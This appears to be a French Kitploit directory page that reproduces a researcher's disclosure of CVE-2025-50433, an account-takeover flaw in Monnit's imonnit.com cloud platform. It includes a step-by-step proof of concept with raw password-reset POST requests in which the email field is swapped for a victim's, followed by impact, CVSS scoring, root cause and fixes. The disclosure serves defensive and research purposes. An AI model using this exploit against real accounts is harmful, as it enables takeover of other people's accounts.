Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-50433 — Divulgation détaillée d'une vulnérabilité critique de prise de contrôle de compte (CVE-2025-50433) dans les plateformes Monnit Cloud, avec PoC étape par étape, analyse des causes profondes et évaluation de sévérité CVSS 9.8. | Kitploit
Outils/GitHubGitHub/0xmandor/cve-2025-50433
Analyse des VulnérabilitésExploitationExploitation d'Applications WebCollecte d'InformationsTests d'IntrusionAuthentification
GitHub0xmandor/cve-2025-50433

CVE-2025-50433

Divulgation détaillée d'une vulnérabilité critique de prise de contrôle de compte (CVE-2025-50433) dans les plateformes Monnit Cloud, avec PoC étape par étape, analyse des causes profondes et évaluation de sévérité CVSS 9.8.

Voir le dépôt
il y a 8 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-50433 — Vulnérabilité critique de prise de contrôle de compte affectant les plateformes cloud Monnit (*.imonnit.com)

Résumé

Une vulnérabilité d'authentification critique existe sur *.imonnit.com qui permet une prise de contrôle totale du compte (ATO) sur n'importe quel compte utilisateur sans interaction de la victime.

Le backend ne parvient pas à valider l'association entre le jeton de réinitialisation de mot de passe et l'email cible, permettant aux attaquants d'utiliser leur propre jeton de réinitialisation valide pour réinitialiser le mot de passe de n'importe quel compte victime.


Vecteur d'attaque (PoC étape par étape)

  1. L'attaquant crée un compte A ([email protected]).
  2. La victime possède un compte B ([email protected]).
  3. L'attaquant demande une réinitialisation de mot de passe pour A et B.
  4. L'attaquant reçoit un jeton de réinitialisation valide pour le compte uniquement.
A
  • L'attaquant ouvre le formulaire de réinitialisation de mot de passe en utilisant le jeton A :
  • root@kitploit:~
        POST /Account/PasswordReset/?VerificationCode=TTT4EB4I HTTP/1.1
        Host: www.imonnit.com
        Cookie: ASP.NET_SessionId=jf3y4eg3qdrefnfnqcj42yut; __RequestVerificationToken=dObesuZNYwsn9USVixM8aZTa9i_E_18PRpfCE0L39NUJlfolWpjSYX0BW32_mK50O5fcGbr3oBMg2S6D4ONl0bJhJS4kmxtHeQEn8Y0kNNt324q5Hc0Gu3JBHH7CwrylvP8XNQ2
    
        __RequestVerificationToken=-realtoken5K0nzPC8H2Aw2&NewPassword=1!Password%21&ConfirmPassword=1!Password%21&[email protected]&[email protected]
    
    1. Avant de soumettre, l'attaquant modifie les champs email et nom d'utilisateur avec l'email de la victime :
    root@kitploit:~
        POST /Account/PasswordReset/?VerificationCode=TTT4EB4I HTTP/1.1
        Host: www.imonnit.com
        Cookie: ASP.NET_SessionId=jf3y4eg3qdrefnfnqcj42yut; __RequestVerificationToken=dObesuZNYwsn9USVixM8aZTa9i_E_18PRpfCE0L39NUJlfolWpjSYX0BW32_mK50O5fcGbr3oBMg2S6D4ONl0bJhJS4kmxtHeQEn8Y0kNNt324q5Hc0Gu3JBHH7CwrylvP8XNQ2
    
        __RequestVerificationToken=-realtoken5K0nzPC8H2Aw2&NewPassword=1!Password%21&ConfirmPassword=1!Password%21&[email protected]&[email protected]
    
    1. Le backend accepte incorrectement l'email + jeton non correspondants.
    2. Le mot de passe de la victime est réinitialisé et l'attaquant obtient un accès complet au compte de la victime.

    Impact

    • Prise de contrôle totale du compte (ATO).
    • Accès complet aux tableaux de bord, capteurs et données du compte de la victime.
    • Capacité à modifier les dispositifs, notifications et configurations.
    • Élévation de privilèges sans interaction de la victime.
    • Exploitation à distance sans prérequis.

    Sévérité

    CVSS 3.1 : 9.8 (Critique)
    Vecteur : AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H


    Domaines affectés

    root@kitploit:~
    *.imonnit.com
    

    Cause racine

    Le point de terminaison de réinitialisation de mot de passe ne valide pas que le jeton de réinitialisation appartient au même email fourni lors de l'opération de réinitialisation, permettant des réinitialisations de mot de passe arbitraires à l'aide de jetons contrôlés par l'attaquant.


    Point de terminaison affecté

    root@kitploit:~
    /Account/PasswordReset/
    

    Vendeur : Monnit Corporation


    Recommandations

    • Imposer une validation stricte de la liaison jeton-email côté backend.
    • Rejeter toute demande de réinitialisation de mot de passe où le jeton ne correspond pas au compte associé.
    • Invalider les jetons immédiatement après utilisation.

    Découvreur

    Mohamed Mandor (0xmandor) GitHub : https://github.com/0xmandor

    Télécharger l’outil